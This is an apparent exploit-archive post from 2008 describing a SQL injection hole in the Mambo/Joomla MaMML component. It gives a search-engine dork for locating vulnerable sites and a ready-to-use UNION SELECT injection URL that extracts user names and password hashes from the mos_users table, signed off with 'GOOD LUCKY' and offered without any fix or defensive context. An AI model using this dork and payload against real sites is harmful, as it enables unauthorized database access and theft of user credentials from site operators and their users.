Mambo Component MaMML (listid) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mambo Component MaMML (listid) Remote SQL Injection Vulnerability
# Published : 2008-01-29
# Author : S@BUN
# Previous Title : Mambo Component Fq (listid) Remote SQL Injection Vulnerability
# Next Title : phpMyClub 0.0.1 (page_courante) Local File Inclusion Vulnerability

#########################################################################
#
# joomla SQL Injection(com_mamml)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_mamml"
#
########################################################################
EXPLOIT :

index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*

#########################################################################
# S@BUN                  www.hackturkiye.com                  S@BUN

#########################################################################
#########################################################################
# S@BUN                       GOOD LUCKY                       S@BUN
#########################################################################

# www.Syue.com [2008-01-29]